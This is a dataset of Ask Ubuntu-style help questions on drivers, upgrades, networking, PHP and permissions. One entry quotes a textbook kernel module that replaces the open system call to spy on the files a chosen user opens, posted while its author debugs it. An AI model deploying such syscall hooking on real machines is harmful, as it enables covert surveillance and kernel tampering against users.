455536	amd catalyst control center displaying unknown discrete graphics card	i have a hp pavilion g6 - 2301ax laptop . it has an a8 apu with amd radeon hd 7640 + 7670m dual graphics . i recently installed ubuntu 14.04 64bit and after installing latest amd catalyst , in the `` display manager '' section is showing my 7670m as - . [ unknown display ] amd radeon hd 7600m series also in the information tab , control center is showing only the 7640 integrated graphics , and not the 7670m gpu . how should i install my 7670m card ? i followed the binarydriverhowto/amd , but i can see only 7640 .
455537	how to run ubuntu , within windows , from a usb drive ?	is is possible to run ubuntu from a usb pen drive , while simultaneously working and running the main os ( windows ) on the computer ? i assume this is like a virtual desktop held on the usb , and displaying in a window on the computer . i would like to be able to explore/ navigate to it , or minimize and maximize in and out of the ubuntu [ session ] , while the windows [ session ] is still in operation . edit/ update : i attempted to install virtual box and a portable v-box onto my 16gb usb without luck . it wanted to only install/ run and operate from my computer not the usb . is there a way to keep all programs on the usb , launch from the usb and never install anything to the host computer ? ( virtual-box or the like ) in conjunction with running ubuntu from that usb like a hard drive and be capable of saving settings , programs and documents ? ( not a live or boot-able usb )
455539	bash - wrong answer by word count command	i am trying to get the word count of a string using the wc command . but it gives me a different answer . it increases the number of words by 1 . this is the code : echo enter a string : read str len=`echo $ str | wc -c` echo you have entered : $ str echo and the word count : $ len the output is like this : enter a string : robin you have entered : robin and word count : 6 what am i doing wrong ? please help me solve this . i will be very grateful . thank you .
455550	mount grub partition	i 'm pretty new to linux . i am trying to make a dedicated partition for bootloader called grub2 . i am following this tutorial and i 'm stuck at step 5 . exit gparted and mount the new grub partition . 'places â grub . ' a new icon called grub should show up on your desktop and its corresponding window should open . it should be mounted under /media/partitionname i think . i 'm trying this with a 14.04 ubuntu live cd
455553	cant open magnet links or apt links with chromium	chromium browser opens a new window instead of handling magnet links or apt links . i 've tried looking aroud and found how to tell chrome what to do with a magnet link but it doesnt work for me .. i 've ran : `` xdg-mime default deluge.desktop x-scheme-handler/magnet `` but nothing changed . xdg-mime query default x-scheme-handler/magnet returns : deluge.desktop and i made sure the name is right . i 'm using lubuntu 14.04 [ lxde ]
455557	how do i look at my main drive when i have ubuntu running on a secondary hdd ?	i am running ubuntu 13.10 on a secondary drive and i need to access the files on my main hdd ( i am using a laptop ) . how do i do this ? edit- i 've had an epiphany that you might have to mount it first . how would i go about doing that ? edit2- output of lsblk name maj : min rm size ro type mountpoint sda 8:0 0 465.8g 0 disk ├─sda1 8:1 0 500m 0 part ├─sda2 8:2 0 40m 0 part /media/llamah/diags ├─sda3 8:3 0 128m 0 part ├─sda4 8:4 0 500m 0 part ├─sda5 8:5 0 452.7g 0 part └─sda6 8:6 0 11.9g 0 part sdb 8:16 0 74.5g 0 disk ├─sdb1 8:17 0 37.3g 0 part / ├─sdb2 8:18 0 1k 0 part └─sdb5 8:21 0 5.6g 0 part [ swap ] sr0 11:0 1 1024m 0 rom edit3- followed avinash raj 's advice and got this output : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
455562	kubuntu going to sleep if i close lid before it go to standby	when i shut-down my computer , if i close the notebook before the shut-down it would go into suspension mode , i tried already to change my personal option of energy but it is n't function/option .
455564	why does python-sympy need 520mb ?	i wanted to install sympy so when i typed sudo apt-get install python-sympy i get the following output : the following new packages will be installed : dvipng fonts-cabin fonts-comfortaa fonts-droid fonts-freefont-otf fonts-gfs-artemisia fonts-gfs-complutum fonts-gfs-didot fonts-gfs-neohellenic fonts-gfs-olga fonts-gfs-solomos fonts-inconsolata fonts-junicode fonts-lato fonts-linuxlibertine fonts-oflb-asana-math fonts-sil-gentium fonts-sil-gentium-basic fonts-stix otf-freefont python-sympy texlive-fonts-extra texlive-fonts-extra-doc texlive-xetex need to get 228 mb of archives . after this operation , 524 mb of additional disk space will be used . do i need all these fonts ? i think that is what is increasing the size so much . if i do n't need them how do i install python-sympy without the fonts . as far as i can tell this is the page for the package python-sympy and it does n't seem to depend / recommend the packages above .
455565	lubuntu 13.10 does not ugrade to 14.04	i 'm trying to upgrade to the newest version of lubuntu , but after i open the software updater , clicking on upgrade , and enter my authentication . the updater just closes and nothing happens . whenever i try again , the same result occurs . anyone else experiencing this problem , and/or know how to proceed ?
455571	verizon lg cosmos mobile broadband ?	i plugged in my cell phone ( verizon lg cosmos ) with ubuntu 13.10 running and a notification came up about mobile broadband . i enabled it and it connected to verizon cdma . can someone explain what is going on and what is happening ?
455578	dnat prerouting does not work on ubuntu 14.04	i 've got a ubuntu 14.04 server used as firewall , router , dhcp , dns and proxy . everything works properly from inside to the internet , but the forwarding from outside to the inside network does n't work . my rules used to work nicely with ubuntu 10.10 but now iâm migrating to 14.04 and having problems . iâve tried to simplify the rules even using just those to rules : iptables -t nat -a postrouting -s 192.168.0.0/24 -o eth0 -j masquerade iptables -t nat -i prerouting -i eth0 -p tcp -- dport 3389 -j dnat -- to 192.168.0.10 considering that the eth0 is my outside interface , how receives the direct internet ip and my network is 192.168.0.0/24 . does anybody have an idea of the problem ?
455584	is this normal ? ubuntu 14.04 gnome 3.9.90 ?	i just finished installing ubuntu 14.04 and gnome shell sudo apt-get install gnome-shell ubuntu-gnome-desktop , however when i checked what version has been installed i read 3.9.90 : is this correct ? is n't ubuntu 14.04 supposed to ship with gnome 3.10 at least ? what am i missing ?
455589	menus in the window 's title bar	i want window menus to stay in the window 's title bar and so have selected system settings > appearance > behaviour > show the menus for a window . in the window 's title bar if i maximise the window the window 's menus ignore that choice and jump up onto the top panel . is this really supposed to happen ?
455590	ca n't install ubuntu !	used unetbootin to create it on the flash drive . tells me to reboot , after rebooting , i press del key to enter the bios . i set the boot priority to my usb . i press f10 and it saves it and reboots . after that windows boots like normal . i have also tried linuxlive usb creator but it still failed . maybe a ubuntu computer can help me ? if it can help , please tell me as i have access to a local cafe that has ubuntu installed on their pc .
455598	ubuntu used as a home media server	i have been using ubuntu 13.10 for the last six months or so . i am very interested in trying to use my current computer as a media server for my home . i have been scouring through google trying to find tutorials and documents but have not found many recent ones . i want to be able to save videos or watch videos from a windows computer , a tablet , and a raspberry pi . i would really appreciate the help , thanks .
455599	printing with fuji xerox cp205w from 14.04 64bit	i have been able to print to a network attached printer from 12.04 32 bit using the xerox phaser 6010n driver . however , i have been unable to make this work on 14.04 64 bit . i have also tried a huge range of generic drivers , zjstream , pcl , gdi , etc , ca n't find anything to work . i did try compiling a driver but that approach is beyond me really . does anyone have a straightforward approach for ubuntu 64 bit and cp205 printer family ?
455600	stop ubuntu from trying to load a gui	so i have a computer running ubuntu server 12.04 , and one operation i did needed a gui ( the application was graphical ) so , being a noob , i ran : sudo apt-get install xubuntu-desktop this worked great and allowed me to have a gui for the thing i needed to do , but now i ca n't get rid of it ! in hindsight i should have just ran : sudo apt-get install xfce4 which would allow me to startx into a gui . anyways , i 've removed xubuntu-desktop and purged all related things , but when i start up the computer instead of booting tot he cli like a normal linux server , it attempts to load up a bunch of gui related things including lightdm and then hangs . how can i revert it to its original server ways ?
455608	14.04_x64 / nvidia gt 240 , huge font notificaton at greeter and in naulitus after log-in	i 've been using 12.04 for a long time - excellent version indeed , i decided to try 14.04 today . installing without any problems . my vga is nvidia gt240 ( legacy one ) , nouveau display driver is fine , font display is normal . then , i decided to install nvidia legacy binary driver 304.117 updates ( proprietary ) instead of default nouveau display driver . problems come after rebooting at greeter a notification `` wired connection 1 -connected '' pop up but with a huge font . after log-in huge font symptom still remains at some parts - for example , calendar , desktop shortcut and files explorer . within few seconds , 10 to 15 may be , there is a screen blink but huge font still remains . i have to log out then log in again to have normal font in all parts of system . changing driver , even an update one form ppa : xorg-edgersnot does n't solve the problem . any advices or solutions will be appreciated .
455613	laptop keyboard turning off randomly	i have been searching for a solution for a while and i have not been able to find one . my laptop keyboard tends to randomly stop working for a random time . there seems to be no rule whether or not will it work and how long will it be `` offline '' ( it can be a few minutes or a few hours ) . also restarting the laptop does n't really do much . during the whole time usb keyboards work normally . i am using toshiba satellite p855-30f . does anyone have an idea what could be the problem and how to solve it ?
455614	downgrade php version from 5.5 to 5.4 on ubuntu 14.04	first time i 've ever needed to ask a question here that i do n't think has already been answered . i 've recently been working on transferring over a vbulletin site i run to a new server . thinking that i was being all ahead of the curve , when i went to install ubuntu on it recently and saw 14.04 was available , i went for it . as i should have expected , it 's a nightmare . turns out that vbulletin just added support for php 5.4 with their last release on the version i run . i honestly do n't expect them to ever get it up to php 5.5 ( what 14.04 installs by default ) . save from going back to 12.04 lts and starting completely over , is there a way i can downgrade the php version installed to 5.4 ? i saw some threads talking about this for going from 5.4 to 5.3 , so i 'm hoping its doable . the simpler you can help me to do this , if possible , the better . i know my way around , but by no means consider myself an expert . thanks ! edit : for clarity . need to downgrade php from 5.5 to 5.4 on 14.04 ( trusty tahr ) .
455615	assigning ehci-pci to an epson v33 scanner instead of xhci_hcd	i have recently installed xubuntu 14.04 on two computers . computer a is a dell aptitude e5430 laptop , whereas computer b is a home-mounted desktop , with an asus h87-plus motherboard . i have been trying to make an epson perfection v33 scanner work with both computers , with mixed results . first of all , i downloaded the appropriate programs from the epson site and installed all three of them on both computers . my dell has 4 usb connectors : one at the right-hand side ( usb2 ) , one at the back ( usb2 ) and two at the left-hand side ( one usb2 and one usb3 ) . if i plug the scanner into the connector at the right-hand side , i can run image scan ! and simple scan without any problem . however , if i use either one of the other two usb2 connectors , the problems start : the sane-find-scanner utility finds and identifies the scanner ; and scanimage -l works ok as well ; but when i try to run image scan ! the scanner produces the customary humming noises , the on lamp blinks for a few seconds , but the image scan ! screen never appears , and after a while the program disconnects and sends the following message : could not send command to scanner . check the scanner 's status . if i run simple scan , the initial screen appears , but i can not make it scan anything . it turns out that when i plug the scanner into connector 1 , the linux kernel assigns ehci-pci to it ; when i use connectors 2 or 3 it assigns xhci_hcd . i have no idea why this happens . anyway , i think it explains why scanning can not occur when connectors 2 or 3 are used , because the epson drivers for this scanner are known to be incompatible with usb3 . to confirm this , i then plugged the scanner into one of the usb2 connectors of computer b ( the asus desktop ) . as with my laptop , sane-find-scanner and scanimage -l showed no problem . but , sure enough , xhci_hcd was assigned to the scanner , and scanning failed , despite the humming and blinking . i then disabled usb3 via bios ; this time ehci-pci was assigned to the scanner , and scanning proceeded normally . i want to keep the scanner plugged to the asus desktop in my office , but disabling usb3 on this computer every time i need to scan is obviously inconvenient . so here is my question : could i make the kernel assign ehci-pci to the scanner instead of xhci_hcd ( maybe through a udev rule ) ? so far i have been unable to find a clear answer or a good solution , so any help will be appreciated . many thanks in advance .
455618	installing php5-fpm but missing www.conf	i am installing php5-fpm on my ubuntu system but could not able to find www.conf file under pool.d directory . in my /etc/php5/fpm folder , there are only 2 directories - conf.d and pool.d command which i am using - apt-get install php5-fpm am i missing anything ?
455620	problem facing while installing truecrypt	i downloaded the .tar.gz of truecrypt and extracted it . as per instructions , on clicking on the file 'truecrypt-7.1a-setup-x64 ' we should get a window that asks us to run the setup . but when i open the file in gedit instead of giving out a window . help me how to install truecrypt . following instructions from this site : link
455626	touchscreen pavilion 14 sleekbook	i just installed ubuntu 12.04 on my hp pavilion touchsmart 14 sleekbook , i have researched everything and still havent come up with a way of making the touchscreen work , a little help here ? im about to give up : (
455629	uget chromium integration not working after upgrading to ubuntu 14.04	chromium extension of uget is not working after upgrading to ubuntu 14.04 .
455631	where is the sound menu on rhythmbox . r	where do you click to open it ? there is no sound.we just got ubuntu yesterday and i know literally nothing about where to find things ... i 'm accustomed to windows media player . and is it worth collecting music on rhythmbox ? is it being phased out as windows xp was ?
455634	ubuntu upgrade 13.10 to 14.04 - why isnt x using my 3d hardware anymore ? [ solved ]	i just upgraded from ubuntu 13.10 to 14.04 , but now i cant login and see my desktop . i get all the way to the login screen and enter my password , but after pressing enter i get left with the 14.04 lts splash screen . i get the same when trying to login as guest . i can press ctrl-alt-f1 and login on the terminal . from the terminal i checked that i 'm using the proprietry driver ( nvidia 331 ( proprietry , tested ) ) . when i tried to run unity from the terminal i see the error `` compiz : open gl not loaded '' any ideas much appreciated . update : is this heading the way of save me stuff from the terminal and fresh install 14.04 ? fix : for people following in my footsteps the fix can be found here
455635	how to remove offending key in git when you try to push your chanes ?	i 've done tons of search and tested different solutions , but gain no success ! when i want to push my codes , i receive the following error : warning : the ecdsa host key for 'git.mywebsite.ir ' differs from the key for the ip address '164.138.23.11' offending key for ip in /home/alireza/.ssh/known_hosts:10 matching host key in /home/alireza/.ssh/known_hosts:1 are you sure you want to continue connecting ( yes/no ) ? yes what should i do to remove this message every time i push my changes ? any idea ? edit
455639	ubuntu 14.04 system freezes on wakeup from suspended state	i did a clean install of ubuntu 14.04 . when i resume from suspended the system freezes after i enter my password . i am forced to power off and start again . i had a similar problem on this laptop when i upgraded to 13.04 and do n't recall how i fixed it . boot_image=/vmlinuz-3.13.0-24-generic root=/dev/mapper/ubuntu -- vg-root ro quiet splash pcie_aspm=force vt.handoff=7 /var/log/pm-suspend.log $ lspci -vnn | grep -a12 vga 01:00.0 vga compatible controller [ 0300 ] : nvidia corporation gt216m [ geforce gt 230m ] [ 10de:0a28 ] ( rev a2 ) ( prog-if 00 [ vga controller ] ) subsystem : hewlett-packard company device [ 103c:3659 ] flags : bus master , fast devsel , latency 0 , irq 47 memory at d2000000 ( 32-bit , non-prefetchable ) [ size=16m ] memory at c0000000 ( 64-bit , prefetchable ) [ size=256m ] memory at d0000000 ( 64-bit , prefetchable ) [ size=32m ] i/o ports at 6000 [ size=128 ] expansion rom at d3080000 [ disabled ] [ size=512k ] capabilities : [ 60 ] power management version 3 capabilities : [ 68 ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ 78 ] express endpoint , msi 00 capabilities : [ b4 ] vendor specific information : len=14 < ? > capabilities : [ 100 ] virtual channel
455640	low grahic mode 12.04	i have been trying to get ubuntu 12.04 to launch on my emachine 2828 . i was able to load it and use the dual setup with windows xp . i am able to run windows , but i have not been able to run ubuntu . i get the low graphic mode message.. my processor is amd sempron 2800+ , and video is via/s3g unichrome igp . i have tried most of the tips posted for low graphics ... any help appreciated
455647	upgrade from 13.10 to 14.04 lts crashes while installing a font	while upgrading from 13.10 to 14.04 , i had to reboot the system . after restart , my screen showed the message the system is running in low-graphics mode . after i pressed ok , the screen showed the message what would you like to do ? . how can i proceed from here ?
455648	install lamp-server using tasksel	i recently have started to work on ubuntu for web development . initially i installed zend server on my ubuntu 12.04.3 lts . but later i decided to go with `` lamp-server '' , so i un-installed the zend server by running /usr/local/zend/bin/uninstall.sh as shown in http : //files.zend.com/help/zend-server-6/content/deb_uninstalling_zend_server.htm now i want to install lamp server using tasksel by running following command sudo tasksel install lamp-server but i am having trouble installing it . i get error page when i go to localhost in a browser . any help will be appreciated . edits from discussion in comments edit 1 after running sudo apt-get install lamp-server^ i get this message : sudo apt-get install lamp-server^ reading package lists ... done building dependency tree reading state information ... done note , selecting 'apache2-utils ' for task 'lamp-server' note , selecting 'libwrap0 ' for task 'lamp-server' note , selecting 'libnet-daemon-perl ' for task 'lamp-server' note , selecting 'libclass-isa-perl ' for task 'lamp-server' note , selecting 'libaprutil1-dbd-sqlite3 ' for task 'lamp-server' note , selecting 'libswitch-perl ' for task 'lamp-server' note , selecting 'perl ' for task 'lamp-server' note , selecting 'libcap2 ' for task 'lamp-server' note , selecting 'libhtml-template-perl ' for task 'lamp-server' note , selecting 'libdbi-perl ' for task 'lamp-server' note , selecting 'apache2.2-bin ' for task 'lamp-server' note , selecting 'mysql-client-core-5.5 ' for task 'lamp-server' note , selecting 'libdbd-mysql-perl ' for task 'lamp-server' note , selecting 'mysql-server-5.5 ' for task 'lamp-server' note , selecting 'libapr1 ' for task 'lamp-server' note , selecting 'mysql-common ' for task 'lamp-server' note , selecting 'mysql-client-5.5 ' for task 'lamp-server' note , selecting 'libaprutil1-ldap ' for task 'lamp-server' note , selecting 'apache2-mpm-prefork ' for task 'lamp-server' note , selecting 'libplrpc-perl ' for task 'lamp-server' note , selecting 'tcpd ' for task 'lamp-server' note , selecting 'apache2 ' for task 'lamp-server' note , selecting 'mysql-server-core-5.5 ' for task 'lamp-server' note , selecting 'apache2.2-common ' for task 'lamp-server' note , selecting 'mysql-server ' for task 'lamp-server' note , selecting 'ssl-cert ' for task 'lamp-server' note , selecting 'perl-modules ' for task 'lamp-server' note , selecting 'libmysqlclient18 ' for task 'lamp-server' note , selecting 'php5-mysql ' for task 'lamp-server' note , selecting 'php5-cli ' for task 'lamp-server' note , selecting 'libapache2-mod-php5 ' for task 'lamp-server' note , selecting 'libaprutil1 ' for task 'lamp-server' note , selecting 'php5-common ' for task 'lamp-server' libapr1 is already the newest version . libaprutil1 is already the newest version . libaprutil1-dbd-sqlite3 is already the newest version . libaprutil1-ldap is already the newest version . libcap2 is already the newest version . libclass-isa-perl is already the newest version . libdbd-mysql-perl is already the newest version . libdbi-perl is already the newest version . libhtml-template-perl is already the newest version . libnet-daemon-perl is already the newest version . libplrpc-perl is already the newest version . libswitch-perl is already the newest version . libwrap0 is already the newest version . tcpd is already the newest version . apache2-mpm-prefork is already the newest version . apache2-utils is already the newest version . apache2.2-bin is already the newest version . apache2.2-common is already the newest version . libapache2-mod-php5 is already the newest version . libmysqlclient18 is already the newest version . mysql-client-5.5 is already the newest version . mysql-client-core-5.5 is already the newest version . mysql-common is already the newest version . mysql-server-5.5 is already the newest version . mysql-server-core-5.5 is already the newest version . perl is already the newest version . perl-modules is already the newest version . php5-cli is already the newest version . php5-common is already the newest version . php5-mysql is already the newest version . ssl-cert is already the newest version . the following new packages will be installed : apache2 mysql-server 0 upgraded , 2 newly installed , 0 to remove and 348 not upgraded . need to get 0 b/13.0 kb of archives . after this operation , 146 kb of additional disk space will be used . do you want to continue [ y/n ] ? y selecting previously unselected package apache2 . ( reading database ... 182247 files and directories currently installed . ) unpacking apache2 ( from ... /apache2_2.2.22-1ubuntu1.5_i386.deb ) ... selecting previously unselected package mysql-server . unpacking mysql-server ( from ... /mysql-server_5.5.37-0ubuntu0.12.04.1_all.deb ) ... setting up apache2 ( 2.2.22-1ubuntu1.5 ) ... edit 2 it seems lamp-server has been installed correctly but when i go to localhost i get this error ' unable to connect firefox ca n't establish a connection to the server at localhost . ' i tried to restart apache2 using sudo service apache2 restart only to face this error : syntax error on line 239 of /etc/apache2/apache2.conf : could not open configuration file /etc/phpmyadmin/apache.conf : no such file or directory action 'configtest ' failed . the apache error log may have more information . ... fail !
455650	ubuntu touch webapp help	i 'm trying to create some webapps with ubuntu touch for the unity 8 interface - no luck so far . specifically , i 'm working on a webapp for credit union australia 's banking service : https : //mb.cua.com.au i just ca n't make it work ! could someone tell me what i 'm doing wrong ? i can package up the click package , install it fine on my nexus 4 , but when i launch it , all i get is a white screen , and nothing happens . here 's the execution code i 'm trying : exec=webapp-container -- enable-back-forward -- webappurlpatterns=https ? : //.cua.com.au/ https : //mb.cua.com.au here 's a link to download the files i 'm working with , as well as a pre-built click app from my server : https : //apps.curiouslegends.com.au/owncloud/public.php ? service=files & t=db76d62351e4b2c50a3abbed6d0e1adb thanks !
455655	system call stealing sample not working in 12.04	i am trying to run the example code of the lkmpg : http : //www.makelinux.net/books/lkmpg/x978 i have made a few changes as the original code was n't working due to `` sys_call_table undefined '' issues.i fixed it and it is compiled and insmoded without errors but when i rmmod it , it says error : module syms is in use dmesg shows : - [ 1600.391496 ] task : def94060 ti : e3db0000 task.ti : e3db0000 [ 1600.391544 ] eip : 0060 : [ ] eflags : 00010282 cpu : 1 [ 1600.391595 ] eip is at init_module+0x67/0x90 [ syms ] [ 1600.391639 ] eax : c1689740 ebx : f93e0090 ecx : 00000006 edx : 00000000 [ 1600.391693 ] esi : 0000035c edi : 00000000 ebp : e3db1e74 esp : e3db1e6c [ 1600.391747 ] ds : 007b es : 007b fs : 00d8 gs : 00e0 ss : 0068 [ 1600.391794 ] cr0 : 8005003b cr2 : c1689754 cr3 : 0b02f000 cr4 : 000407f0 [ 1600.392033 ] stack : [ 1600.392033 ] f93e1064 00000000 e3db1ee0 c100217a 00000000 00000001 00000001 0003375a [ 1600.392033 ] c10eb296 00000000 00000000 f8ab9000 00000000 0000035c e3db1ecc c104b20f [ 1600.392033 ] 00000000 80000000 00000000 00000000 00000000 00000000 00000000 f8aba000 [ 1600.392033 ] call trace : [ 1600.392033 ] [ ] do_one_initcall+0x9a/0xf0 [ 1600.392033 ] [ ] ? tracepoint_module_notify+0x26/0xc0 [ 1600.392033 ] [ ] ? set_memory_nx+0x5f/0x70 [ 1600.392033 ] [ ] do_init_module+0x80/0x1c6 [ 1600.392033 ] [ ] load_module+0x358/0x520 [ 1600.392033 ] [ ] ? show_initstate+0x50/0x50 [ 1600.392033 ] [ ] sys_init_module+0xab/0xf0 [ 1600.392033 ] [ ] sysenter_do_call+0x12/0x28 [ 1600.392033 ] code : 04 24 48 11 3e f9 e8 45 92 28 c8 c7 04 24 51 10 3e f9 e8 39 92 28 c8 c7 04 24 64 10 3e f9 e8 2d 92 28 c8 a1 00 20 3e f9 8b 50 14 40 14 00 00 3e f9 a1 a8 21 3e f9 c7 04 24 82 10 3e f9 89 15 [ 1600.392033 ] eip : [ ] init_module+0x67/0x90 [ syms ] ss : esp 0068 : e3db1e6c [ 1600.392033 ] cr2 : 00000000c1689754 [ 1600.392033 ] -- - [ end trace 93652cac357f222b ] -- - /* * the necessary header files */ /* * standard in kernel modules */ # include < asm/cacheflush.h > # include < linux/utsname.h > # include < linux/kernel.h > /* we 're doing kernel work */ # include < linux/module.h > /* specifically , a module , */ # include < linux/moduleparam.h > /* which will have params */ # include < linux/unistd.h > /* the list of system calls */ /* * for the current ( process ) structure , we need * this to know who the current user is . */ # include < linux/sched.h > # include < asm/uaccess.h > unsigned long *sys_call_table = ( unsigned long * ) 0xc1689740 ; /*i got this from /boot/sysmap */ //extern void *sys_call_table [ ] ; /* * uid we want to spy on − will be filled from the * command line */ static int uid ; module_param ( uid , int , 0644 ) ; /* * a pointer to the original system call . the reason * we keep this , rather than call the original function * ( sys_open ) , is because somebody else might have * replaced the system call before us . note that this * is not 100 % safe , because if another module * replaced sys_open before us , then when we 're inserted * we 'll call the function in that module − and it * might be removed before we are . * * another reason for this is that we ca n't get sys_open . * it 's a static variable , so it is not exported . */ asmlinkage int ( *original_call ) ( const char * , int , int ) ; asmlinkage int ( *getuid_call ) ( void ) ; asmlinkage int our_sys_open ( const char *filename , int flags , int mode ) { int i = 0 ; char ch ; /* * check if this is the user we 're spying on */ if ( uid == getuid_call ( ) ) { //current- > uid /* * report the file , if relevant */ printk ( `` opened file by % d : `` , uid ) ; do { get_user ( ch , filename + i ) ; i++ ; printk ( `` % c '' , ch ) ; } while ( ch ! = 0 ) ; printk ( `` \n '' ) ; } /* * call the original sys_open − otherwise , we lose * the ability to open files */ return original_call ( filename , flags , mode ) ; } /* * initialize the module − replace the system call */ int init_module ( ) { /* * warning − too late for it now , but maybe for * next time ... */ printk ( `` i 'm dangerous . i hope you did a `` ) ; printk ( `` sync before you insmod'ed me.\n '' ) ; printk ( `` my counterpart , cleanup_module ( ) , is even '' ) ; printk ( `` more dangerous . if\n '' ) ; printk ( `` you value your file system , it will `` ) ; printk ( `` be \ '' sync ; rmmod\ '' \n '' ) ; printk ( `` when you remove this module.\n '' ) ; /* * keep a pointer to the original function in * original_call , and then replace the system call * in the system call table with our_sys_open */ original_call = sys_call_table [ __nr_open ] ; sys_call_table [ __nr_open ] = our_sys_open ; /* * to get the address of the function for system * call foo , go to sys_call_table [ __nr_foo ] . */ printk ( `` spying on uid : % d\n '' , uid ) ; return 0 ; } /* * cleanup − unregister the appropriate file from /proc */ void cleanup_module ( ) { /* * return the system call back to normal */ if ( sys_call_table [ __nr_open ] ! = our_sys_open ) { printk ( `` somebody else also played with the `` ) ; printk ( `` open system call\n '' ) ; printk ( `` the system may be left in `` ) ; printk ( `` an unstable state.\n '' ) ; } sys_call_table [ __nr_open ] = original_call ; }
455656	styling xfceapplicationsmenuplugin with gtkrc	i 'm a bit stumped . i 'm using xubuntu 14.04 and the old applications menu is better for my workflow than the new whisker menu . in xfce 4.10.0 , i could increase the icon size in the xfce applications menu from the default 16px to 22px by simply editing home/.config/xfce4/xfconf/xfce-perchannel-xml/xsettings.xml . according to xfce docs , that function is now taken over by the gtkrc theme file : xfceapplicationsmenuplugin -- -- -- -- -- -- -- -- -- -- -- -- -- -- - you can set a custom icon size in gtk-icon-sizes with the name panel-applications-menu . the default icon size is 16px . special widget name in this plugin is applicationmenu-button . ( [ source ] [ 1 ] ) there 's no example there so i have tried variants of the following with no success : style `` panel-applications-menu '' { gtk-icon-sizes = `` panel-applications-menu = 24,24 '' } class `` xfceapplicationsmenuplugin '' style `` panel-applications-menu '' widget `` applicationmenu-button '' style `` panel-applications-menu '' does anyone have any idea what i 'm doing wrong ?
455659	recover unallocated space	i use a samsung nc10 and installed linux because a windows xp repartitioning exercise failed disastrously . i am delighted with ubuntu and there is nothing i need to recover from the windows installation , but i am left with over 30gb unallocated which i would like to access . what is the best approach ? paul
455660	have to press fn+alt+volume up/down keyboard shortcut after upgrade to 14.04	my fn+volume up/down key on a macbook pro late 2011 used to be functional as usual in ubuntu 13.10 . after upgrading to ubuntu 14.04 , i have to press the fn+alt+volume up/down keyboard combination to do the same . the weird thing is when i set this function in system settings - > keyboard - > shortcuts - > sound and media , i only push fn+volume up/down . it sets the key binding correctly without alt while not working with the alt .
455664	change group access to directory and all sub directories and files	there is root ownership and root group applied to /media/pandya/ext4/* ( `` pandya '' is user-name ) . to apply group `` pandya '' i run following command : sudo chown -hr root : pandya /media/pandya/ext4/* now , there is root ownership and `` pandya '' group applied to /media/pandya/ext4 and all sub files and directories . but group `` pandya '' has only permission `` access files '' ( for directories ) and `` read files '' ( for files ) for all sub directories and files . so , how to apply full permissions ( `` create and delete files '' to directories and `` read and write '' to files ) to group `` pandya '' ? so-that i can fully access /media/pandya/ext4/ and all sub directories and folders with `` pandya '' group .
455665	unmet dependencies because of too few disk space	i 'm trying to install owncloud on ubuntu server 14.04 running on cubieboard2 . ubuntu works fine at this stage . i did sudo apt-get install owncloud and the install process started but there was n't enough disk space to finish it ... so some packages are installed but not all and there are dependencies problems . thanks to sudo dpkg -- configure -a , i know which one are faulty ( libreoffice-base , to name one ) . so i tried to do sudo apt-get remove libreoffice-base but it complains because of unmet depedencies , and suggest to run sudo apt-get -f install , which i ran . then it correctly idezntify the problem and the missing packages and suggest to install them but as my disk space did n't grow in the meantime , it is not a solution ... i found a lot of explanation describing how to fix dependencies issues by installing the missing packages , but not how to remove the `` orphan '' ones . i would like to do this first , before installing owncloud and its dependencies on an external sd card .
455670	installing it on no usb boot , no dvd pc ?	i want to install it on old celeron 3ghz that ca n't boot from usb ( bios does n't seem to support it ) and has just cd not a dvd . it currently runs xp . what are my options here ? it has a second hdd if that helps .
455673	ati hdmi sound output under ubuntu 14.04	i tried the following steps to get my hdmi sound output working under 14.04 : grub_cmdline_linux= '' radeon.audio=1 '' in /etc/default/grub sudo update-grub go to alsa daily build snapshots select `` oem-audio-hda-daily-dkms - 0.201404230703~ubuntu14.04.1 '' in `` package files '' download the .deb-file install the .deb-file on your system restart the system this does n't work for me . fyi my radeon is a 5750 series card .
455677	how to edit the color of the title bar and border width of a gtk3 theme ?	can someone tell me which file and item is edited to change the title bar and the border width in the gtk3 themes ? i 'm using ubuntu version 14.04 . note : this is related to using the themes in the repository ( 14.04 ) .
455679	system error after halted upgrade	i recently upgraded xubuntu from xubuntu 13.10 to 14.04 , trusty tahr , while in the middle of upgrade ( after downloading ) , my computer powered off . again after sometime i turned on my computer , i saw error notification on the right top which said to run apt-get and after which again said to run sudo dpkg -- configure -a , i do n't know what happened after that , but it seems i got my new 64 bit 14.04 xubuntu , only that everytime i log in , the first thing i see is system error message ( which it asks to cancel or send report ) . and my mouse is not working ( i am using touchpad ) , and no internet connection . when i click edit from the left top , i can see my wifi , and networking is also enabled . but somehow my computer does n't seem to connect to any network .
455682	14.04 chinese ibus input - no options	getting my new 14.04 rig going ; - ) pretty happy with it , everything seems to be working great . for chinese input , however , having a problem . i went through the typical steps , open language in settings , let it install some stuff , then add chinese and choose ibus . then , after logging in and out , i see the language icon in my system tray . however , when i go to add the chinese into ibus , it only lets me choose `` chinese '' , which is n't an input method . it should give me a bunch of choices like pinyin , bopomo or whatever , i only use pinyin so do n't know those names . i saw someone online had a little command which helped people with similar problems , but it did not work for me , even after a re-start . so , anyone got a solution ? edit : here is what it looks like , just `` chinese '' in the list , when there should be a bunch of input options like pinyin , potomofo , and so on .
455683	router wifi connection problem	i have a router zte h218n . it work ok on lan , but i 'm unable to connect my hp on wireless . another hp on my desk , with win , wi fi works perfect . could somebody help me with some ideas ?
455684	make update-manager ignore mozilla firefox updates	when i start update manager to update my system , there is an update for mozilla firefox under the important security updates section . i do not use firefox , i use google chrome , which is also my default browser . the problem is that every time i update , i have to find and unselect firefox from that list of updates . i do n't want to uninstall firefox , but i do n't want to update it either . i update chrome regularly , and i want to continue using it in the future . so is there a way to make update manager ignore updates for firefox ?
